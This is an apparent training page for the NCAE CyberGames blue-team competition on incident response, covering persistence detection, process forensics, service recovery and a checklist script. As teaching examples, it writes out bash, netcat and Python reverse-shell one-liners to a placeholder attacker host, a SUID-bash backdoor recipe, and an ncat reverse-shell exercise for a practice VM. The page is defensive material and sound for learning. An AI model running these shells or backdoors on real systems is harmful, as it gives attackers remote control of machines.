NCAE: Incident Response Under Fire
The first 15 minutes, persistence detection, and service recovery
Incident Response Under Fire
Your system has been compromised. An attacker is on your network. Services are going down. You have minutes, not hours. Incident response (IR) is the process of detecting, containing, and recovering from a security breach — while the attack is still happening.
In NCAE CyberGames, red team operators actively attack your network during the competition. They will compromise services, plant backdoors, change passwords, and try to maintain persistent access. Your job is to find what they’ve done, undo it, and keep your services scoring — all under extreme time pressure.
This page teaches the first-15-minutes checklist, every persistence mechanism attackers use, process forensics, and step-by-step service recovery procedures.
Prerequisites: You should be comfortable with file permissions, process management, and basic shell scripting from earlier lessons.
1. What is Incident Response?
Incident response has four phases:
| Phase | Goal | Time |
|---|---|---|
| Detection | Discover that something is wrong | Seconds to minutes |
| Containment | Stop the bleeding — prevent further damage | Minutes |
| Eradication | Remove the attacker’s access and tools | Minutes to hours |
| Recovery | Restore services to normal operation | Minutes to hours |
In competition, all four phases happen simultaneously. You can’t take the server offline to investigate — services must keep scoring. This means you need a systematic approach: check the most impactful things first, fix them fast, and move on.
The single biggest mistake teams make is chasing the attacker instead of fixing services. The scoring engine doesn’t care whether you caught the red team. It cares whether your services are up. Fix first, hunt second.
2. The First 15 Minutes
The first 15 minutes after discovering a compromise determine the rest of the engagement. Run through this checklist in order. Each item has the exact command to use.
Check 1: Unauthorized SSH keys
Attackers add their public key to authorized_keys files so they can SSH in without a password — even after you change passwords. Check every user’s authorized_keys:
# Check all authorized_keys files on the system
for user_home in /home/* /root; do
if [ -f "$user_home/.ssh/authorized_keys" ]; then
echo "=== $user_home ==="
cat "$user_home/.ssh/authorized_keys"
fi
done
If you see keys you don’t recognize, remove them:
# Remove all unauthorized keys (keep only yours)
echo "ssh-ed25519 AAAA... your@email" > /home/youruser/.ssh/authorized_keys
Check 2: All crontabs
Cron jobs run on a schedule. Attackers use them to re-establish access, re-open backdoors, or re-download malware:
# Check every user's crontab
for user in $(cut -d: -f1 /etc/passwd); do
crontab_output=$(crontab -l -u "$user" 2>/dev/null)
if [ -n "$crontab_output" ]; then
echo "=== $user ==="
echo "$crontab_output"
fi
done
# Check system crontabs
ls -la /etc/cron.d/
cat /etc/crontab
ls -la /etc/cron.daily/ /etc/cron.hourly/
Suspicious signs: cron jobs that download files (wget, curl), run netcat (nc, ncat), or execute scripts from /tmp.
Check 3: New user accounts
Attackers create new accounts for persistent access:
# Show all users with UID >= 1000 (human accounts)
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd
# Show all users with UID 0 (root-equivalent)
awk -F: '$3 == 0 {print $1}' /etc/passwd
If UID 0 shows anything besides root, that’s a backdoor account with full root privileges.
Check 4: SUID binaries
A SUID binary runs with the permissions of its owner, not the user who executes it. If an attacker creates a SUID-root binary, any user can run it and get root access:
# Find SUID binaries outside standard system directories
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'
Legitimate SUID binaries live in /usr/bin, /usr/sbin, /bin, /sbin. Anything in /tmp, /home, /var, or /opt is suspicious.
Check 5: Listening ports
See what’s listening on the network. Unexpected services mean backdoors:
ss -tulnp
Compare against what should be running. If you see something on port 4444, 5555, or any unusual high port — and it’s not one of your services — investigate the process.
Check 6: Running processes
ps aux --forest
The --forest flag shows parent-child relationships, which reveals how processes were spawned. Look for:
- Processes running as root that shouldn’t be
- Shell processes (
/bin/bash,/bin/sh) with no terminal (TTY column shows?) - Processes with suspicious names or running from
/tmp - Netcat (
nc,ncat), Python, or Perl processes that look like reverse shells
Check 7: Recently modified files in /etc
find /etc -mmin -60 -type f 2>/dev/null
This shows every file in /etc modified in the last 60 minutes. If the competition just started, any modifications are suspicious. Pay special attention to passwd, shadow, sudoers, and service configs.
Checkpoint: You find an authorized_keys entry you don't recognize, a cron job that runs wget every 5 minutes, and a new user with UID 0. In what order do you fix these?
Priority order based on severity:
- UID 0 user — this gives full root access. Remove immediately:
userdel -r backdoor_user - authorized_keys — this gives passwordless SSH access. Remove the key now.
- Cron job — this will re-infect you. Remove:
crontab -r -u affected_useror delete the file from/etc/cron.d/.
The UID 0 account is most dangerous because it’s root-equivalent. The cron job will undo your fixes if you don’t remove it, but the UID 0 account gives immediate unrestricted access.
3. Persistence Mechanisms
Persistence is how attackers maintain access after initial compromise. They assume you’ll eventually change passwords and restart services — so they plant multiple backdoors that survive these actions.
SSH authorized_keys
How it works: Attacker adds their public key to a user’s ~/.ssh/authorized_keys. Now they can SSH in as that user without knowing the password.
Detection:
# Check all authorized_keys files
find / -name "authorized_keys" 2>/dev/null -exec echo "=== {} ===" \; -exec cat {} \;
Removal: Delete unauthorized keys. Verify by comparing against your team’s known public keys.
Cron jobs
How it works: A cron job runs on a schedule (e.g., every 5 minutes) and re-downloads malware, re-opens a reverse shell, or re-adds the attacker’s SSH key.
Detection:
# All user crontabs
for user in $(cut -d: -f1 /etc/passwd); do echo "--- $user ---"; crontab -l -u "$user" 2>/dev/null; done
# System cron directories
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/
cat /etc/crontab
Removal:
crontab -r -u compromised_user # Remove user's entire crontab
rm /etc/cron.d/suspicious_file # Remove system cron entry
Systemd services and timers
How it works: Attacker creates a systemd service that starts on boot, or a timer that fires periodically. These survive reboots and are harder to spot than cron jobs.
Detection:
# List all enabled services (look for unfamiliar names)
systemctl list-unit-files --state=enabled
# List all active timers
systemctl list-timers --all
# Check for recently created unit files
find /etc/systemd/system/ /usr/lib/systemd/system/ -mmin -120 -type f 2>/dev/null
Removal:
sudo systemctl stop malicious.service
sudo systemctl disable malicious.service
sudo rm /etc/systemd/system/malicious.service
sudo systemctl daemon-reload
New user accounts
How it works: Attacker creates a new user, sometimes with UID 0 (root-equivalent). Changing the root password doesn’t affect this account.
Detection:
# Users with UID 0 (should only be root)
awk -F: '$3 == 0 {print $1}' /etc/passwd
# Recently created users (high UIDs)
awk -F: '$3 >= 1000 {print $1, $3}' /etc/passwd
# Users with login shells (can SSH in)
grep -v '/nologin\|/false' /etc/passwd
Removal:
sudo userdel -r backdoor_user
SUID binaries
How it works: Attacker copies /bin/bash somewhere and sets the SUID bit. Now any user can run it and get a root shell:
# What the attacker does:
cp /bin/bash /tmp/.hidden_shell
chmod u+s /tmp/.hidden_shell
# Now any user runs: /tmp/.hidden_shell -p → root shell
Detection:
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/'
Removal:
rm /tmp/.hidden_shell # Delete the binary entirely
# Or remove just the SUID bit:
chmod u-s /path/to/suspicious_binary
Modified .bashrc / .profile
How it works: Attacker adds a command to a user’s .bashrc or .profile. It runs every time that user logs in or opens a new shell.
Detection:
# Check root's and all users' shell startup files
for user_home in /home/* /root; do
for rc in .bashrc .profile .bash_profile .bash_login; do
if [ -f "$user_home/$rc" ]; then
echo "=== $user_home/$rc ==="
tail -5 "$user_home/$rc"
fi
done
done
Look for lines that run netcat, curl, wget, or execute files from /tmp.
Removal: Edit the file and remove the malicious lines.
Reverse shells
How it works: A reverse shell connects back to the attacker’s machine, giving them a command line. Common variants:
# Bash reverse shell (what the attacker runs on your machine)
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Netcat reverse shell
nc attacker_ip 4444 -e /bin/bash
# Python reverse shell
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
Detection:
# Look for processes with network connections to unexpected IPs
ss -tupn | grep ESTAB
# Look for bash/sh/python processes without a terminal
ps aux | grep -E '(bash|sh|python|perl|nc|ncat)' | grep -v grep
Removal: Kill the process:
kill -9 <PID>
Then find and remove whatever restarts it (cron, systemd, .bashrc).
Checkpoint: You kill a reverse shell process, but 5 minutes later it's back. What's restarting it?
Something is persisting the reverse shell. Check in this order:
- Cron —
crontab -lfor all users, check/etc/cron.d/ - Systemd timer —
systemctl list-timers --all - .bashrc/.profile — Check if the reverse shell command is in a startup file (runs on next login)
- Another process — A parent process might be re-spawning it. Check
ps aux --forestfor parent-child relationships.
The answer is almost always cron. Kill the reverse shell AND remove the cron job.
4. Process Forensics
When you spot a suspicious process, investigate it before killing it. Understanding what it does tells you what else the attacker might have done.
Investigate a running process
# See all processes in a tree (parent-child relationships)
ps aux --forest
Sample output showing a reverse shell:
root 1234 0.0 0.1 12345 6789 ? Ss 10:00 0:00 /usr/sbin/sshd
root 2345 0.0 0.1 12345 6789 ? Ss 10:05 0:00 \_ sshd: attacker [priv]
attacker 2346 0.0 0.1 12345 6789 ? S 10:05 0:00 \_ sshd: attacker@notty
attacker 2347 0.0 0.0 4567 1234 ? S 10:05 0:00 \_ bash -i
attacker 2400 0.0 0.0 3456 890 ? S 10:06 0:00 \_ nc 172.16.99.1 4444 -e /bin/bash
This tells the story: someone SSH’d in as “attacker”, opened a bash shell, and started a netcat reverse shell to 172.16.99.1.
Dig deeper with /proc
Every running process has a directory under /proc/<PID>/ containing everything about it:
PID=2400 # The suspicious process
# How was the process started? (full command line)
cat /proc/$PID/cmdline | tr '\0' ' '
# What binary is actually running? (symlink to the executable)
ls -la /proc/$PID/exe
# What files does it have open?
ls -la /proc/$PID/fd/
# What is its working directory?
ls -la /proc/$PID/cwd
# What environment variables does it have?
cat /proc/$PID/environ | tr '\0' '\n'
lsof — List Open Files
lsof shows all resources a process is using: files, sockets, pipes:
# All resources for a specific process
lsof -p 2400
# Just network connections for a process
lsof -i -p 2400
Identifying a reverse shell from ps output
Red flags in ps aux output:
| Sign | What it means |
|---|---|
? in the TTY column |
No terminal attached — process is running in background, possibly a daemon or backdoor |
bash -i or sh -i |
Interactive shell, suspicious if TTY is ? |
nc, ncat, socat with an IP |
Netcat connecting to a remote host — almost certainly a reverse shell |
python -c 'import socket...' |
Python reverse shell one-liner |
Process running from /tmp |
Binaries in /tmp are always suspicious |
| Unknown username | Account you didn’t create |
The forensics workflow
- Spot it:
ps aux --forestandss -tupn - Investigate it:
/proc/<PID>/cmdline,/proc/<PID>/exe,lsof -p <PID> - Record it: Write down the PID, command, user, connections (for your team’s notes)
- Kill it:
kill -9 <PID> - Find persistence: What restarts this process? Check cron, systemd, .bashrc
- Remove persistence: Delete the mechanism that relaunches it
Checkpoint: ps shows a process running as root with command "/tmp/.x" and no terminal. /proc/PID/exe points to /tmp/.x. What are your next steps?
- Check what it is:
file /tmp/.x— is it a compiled binary, a script, or a known shell? - Check connections:
lsof -i -p <PID>— is it connecting to an external IP? - Check /proc/PID/fd: What files does it have open?
- Kill it:
kill -9 <PID> - Remove the binary:
rm /tmp/.x - Find persistence: How did it start? Check cron, systemd timers, .bashrc, and look for a parent process in
ps aux --forest. - Check for more: Attacker may have planted similar binaries elsewhere. Run
find /tmp /var/tmp /dev/shm -type f -executable 2>/dev/null.
5. Service Recovery Drill
When red team breaks your services, you need to restore them fast. Here are step-by-step recovery procedures for the three most critical services.
SSH Recovery
# Step 1: Check if sshd is running
systemctl status sshd
# Step 2: Restore config from backup (if you made one)
sudo cp /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
# Or restore critical settings manually:
sudo sed -i 's/^PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sudo sed -i 's/^PasswordAuthentication.*/PasswordAuthentication yes/' /etc/ssh/sshd_config
# Step 3: Fix permissions (sshd is strict about these)
sudo chmod 644 /etc/ssh/sshd_config
sudo chmod 600 /etc/ssh/ssh_host_*_key
sudo chmod 644 /etc/ssh/ssh_host_*_key.pub
# Step 4: Test config syntax
sudo sshd -t
# Step 5: Restart
sudo systemctl restart sshd
# Step 6: Verify
ssh localhost
ss -tulnp | grep :22
PostgreSQL Recovery
# Step 1: Check if PostgreSQL is running
systemctl status postgresql
# Step 2: Restore pg_hba.conf (authentication config)
# This file controls who can connect and how they authenticate
sudo cp /var/lib/pgsql/data/pg_hba.conf.bak /var/lib/pgsql/data/pg_hba.conf
# Or fix manually --- this allows local and network password auth:
# local all all md5
# host all all 10.0.5.0/24 md5
# Step 3: Fix ownership and permissions
sudo chown postgres:postgres /var/lib/pgsql/data/pg_hba.conf
sudo chmod 640 /var/lib/pgsql/data/pg_hba.conf
# Step 4: Restart
sudo systemctl restart postgresql
# Step 5: Verify (test a connection)
psql -h localhost -U postgres -c "SELECT 1;"
ss -tulnp | grep :5432
DNS Recovery
# Step 1: Check if named is running
systemctl status named
# Step 2: Restore named.conf from backup
sudo cp /etc/named.conf.bak /etc/named.conf
# Step 3: Restore zone files from backup
sudo cp /var/named/team5.cyber.local.zone.bak /var/named/team5.cyber.local.zone
# Step 4: Validate both configs
named-checkconf
named-checkzone team5.cyber.local /var/named/team5.cyber.local.zone
# Step 5: Fix ownership
sudo chown named:named /var/named/team5.cyber.local.zone
# Step 6: Restart
sudo systemctl restart named
# Step 7: Verify
dig @localhost team5.cyber.local
ss -tulnp | grep :53
The backup lesson
Every recovery procedure above starts with “restore from backup.” Make backups in the first 5 minutes of competition, before red team touches anything:
# Run this FIRST THING in competition
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo cp /etc/named.conf /etc/named.conf.bak
sudo cp /var/named/team5.cyber.local.zone /var/named/team5.cyber.local.zone.bak
sudo cp /var/lib/pgsql/data/pg_hba.conf /var/lib/pgsql/data/pg_hba.conf.bak
6. The IR Script
This script automates the first-15-minutes checklist. Save it, make it executable, and run it the moment you suspect a compromise:
#!/usr/bin/env bash
# ir-check.sh — First-15-minutes incident response checklist
# Usage: sudo ./ir-check.sh
set -euo pipefail
echo "=========================================="
echo " INCIDENT RESPONSE CHECKLIST"
echo " $(date)"
echo "=========================================="
echo ""
echo "[1] AUTHORIZED_KEYS FILES"
echo "---"
for home in /home/* /root; do
[ -f "$home/.ssh/authorized_keys" ] && echo "$home:" && cat "$home/.ssh/authorized_keys"
done
echo ""
echo "[2] CRONTABS (all users)"
echo "---"
for user in $(cut -d: -f1 /etc/passwd); do
output=$(crontab -l -u "$user" 2>/dev/null) && echo "$user: $output"
done
echo "System cron.d:"
ls -la /etc/cron.d/ 2>/dev/null
echo ""
echo "[3] USERS WITH UID 0 (root-equivalent)"
echo "---"
awk -F: '$3 == 0 {print $1}' /etc/passwd
echo ""
echo "[4] USERS WITH UID >= 1000"
echo "---"
awk -F: '$3 >= 1000 {print $1, $3, $7}' /etc/passwd
echo ""
echo "[5] SUID BINARIES (non-standard paths)"
echo "---"
find / -perm -4000 -type f 2>/dev/null | grep -v -E '^/(usr|bin|sbin)/' || echo "(none found)"
echo ""
echo "[6] LISTENING PORTS"
echo "---"
ss -tulnp
echo ""
echo "[7] PROCESS TREE"
echo "---"
ps aux --forest
echo ""
echo "[8] RECENTLY MODIFIED FILES IN /etc (last 60 min)"
echo "---"
find /etc -mmin -60 -type f 2>/dev/null || echo "(none found)"
echo ""
echo "[9] ESTABLISHED CONNECTIONS"
echo "---"
ss -tupn | grep ESTAB
echo ""
echo "[10] ACTIVE SYSTEMD TIMERS"
echo "---"
systemctl list-timers --all --no-pager 2>/dev/null
echo ""
echo "=========================================="
echo " CHECKLIST COMPLETE — Review output above"
echo "=========================================="
Make it executable and run it:
chmod +x ir-check.sh
sudo ./ir-check.sh | tee ir-report-$(date +%H%M).txt
The tee command saves the output to a timestamped file while also displaying it on screen. Run this multiple times during competition to track changes.
7. Triage Under Time Pressure
When multiple things are broken and red team is still active, you need a decision framework. Not everything is equally important.
Service priority by scoring weight
| Priority | Service | Weight | Fix first? |
|---|---|---|---|
| 1 | SMB Login | 3x | Always first |
| 2 | SSH | 2x | Second |
| 3 | DNS | 2x | Second (tied with SSH) |
| 4 | Web, FTP, etc. | 1x | After high-weight services |
The triage loop
1. Run ir-check.sh (2 minutes)
2. Fix highest-weight broken service (3-5 minutes)
3. Remove persistence mechanisms found in step 1 (2-3 minutes)
4. Verify services are scoring (1 minute)
5. Go back to step 1
What NOT to do
| Bad move | Why it fails |
|---|---|
| Chasing red team through logs | You lose points while services are down |
| Rebooting the server | Kills all active sessions — including yours |
| Changing all passwords at once | You lose access before setting up alternatives |
| Installing new software during competition | Wastes time and may break dependencies |
| Panicking and making random changes | Unclear state makes debugging impossible |
What TO do
| Good move | Why it works |
|---|---|
| Fix services before hunting | Points accumulate while you investigate |
| Use your backup configs | 30-second restore vs 10-minute debugging |
| Run ir-check.sh after every fix | Catches re-infection immediately |
| Divide work across team members | One person fixes services, another hunts persistence |
| Document what you find | Build a timeline so you can predict what red team will do next |
Checkpoint: SMB is down (3x weight), SSH is compromised (someone changed the root password), and you found a cron-based reverse shell. You have one person. What do you fix first?
SMB first. It’s worth 3x. Get it scoring by following the quick recovery procedure from the SMB lesson. Then kill the reverse shell and remove the cron job (takes 30 seconds). Then deal with SSH — change the root password back, verify sshd_config, restart. The reverse shell is dangerous, but if you fix SMB and then immediately kill the shell, you’ve minimized both point loss and attacker access.
Exercises
-
IR Drill: Set up a practice VM with three backdoors: an authorized_keys entry, a cron job reverse shell, and a SUID bash in /tmp. Run
ir-check.shand identify all three. Remove them in under 5 minutes. -
Process Forensics Lab: Start a fake reverse shell on a practice VM (
ncat -e /bin/bash your_ip 4444). From a second terminal, useps aux --forest,/proc/<PID>/cmdline,/proc/<PID>/exe,lsof -p, andss -tupnto fully investigate it. Write a one-paragraph forensics report. -
Service Recovery Race: Set up SSH, Samba, and DNS on a practice VM. Have a partner break one service (stop it, corrupt the config, change a password). Time yourself restoring it using only the recovery procedures in this lesson. Target: under 3 minutes.
-
Persistence Gauntlet: Have a partner plant 5 persistence mechanisms on a practice VM (one from each category: authorized_keys, cron, systemd service, new user, SUID binary). Find and remove all 5 in under 10 minutes.
Resources
Practice: BlueTeamLabs Online (incident response challenges) · CyberDefenders (forensics and IR)
Reference: NIST Incident Response Guide (SP 800-61) · SANS Incident Handler’s Handbook
Video: John Hammond — IR and forensics · NCAE CyberGames competition walkthroughs